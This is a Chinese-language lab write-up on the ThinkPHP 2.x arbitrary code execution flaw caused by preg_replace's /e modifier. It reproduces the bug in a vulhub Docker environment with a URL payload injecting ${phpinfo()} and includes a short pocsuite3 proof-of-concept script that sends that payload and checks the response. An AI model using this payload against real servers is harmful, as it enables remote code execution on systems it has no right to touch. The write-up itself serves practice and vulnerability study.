thinkphp 2.x任意代码执行
1.漏洞概述
ThinkPHP 2.x版本中,使用preg_replace
的/e
模式匹配路由:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
2.环境搭建
在/vulhub/thinkphp/2-rce下执行docker-compose up -d
环境启动后,访问http://192.168.1.142:8080/index.php
查看默认页面
3.漏洞复现
直接访问http://192.168.1.142:8080/index.php?s=/index/index/name/${phpinfo()}
即可执行phpinfo()
POC
from pocsuite3.api import Output, POCBase,register_poc,requests,logger
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
class DemoPOC(POCBase):
vulID = ''
version = '1'
author = 'wcs'
vulDate = '2022-04-16'
createDate = '2022-04-16'
updateDate = '2022-04-16'
references = []
name = 'thinkphp 2-rce 任意代码执行漏洞'
appPowerLink = ''
appName = ''
appVersion = ''
vulType = '任意代码执行'
desc = '''
练习pocsuite
'''
samples = []
install_requires = []
def _verify(self):
output = Output(self)
result = {} # 验证代码
payload = "/index.php?s=/index/index/name/${phpinfo()}"
url = self.url
try:
resq = requests.get(url+payload)
if resq and resq.status_code == 200 and "PHP Version" in resq.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = payload
except Exception as e:
pass
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
register_poc(DemoPOC)
这个POC主要是自己练习使用pocsuite,就利用了现成的靶场,验证代码也比较简单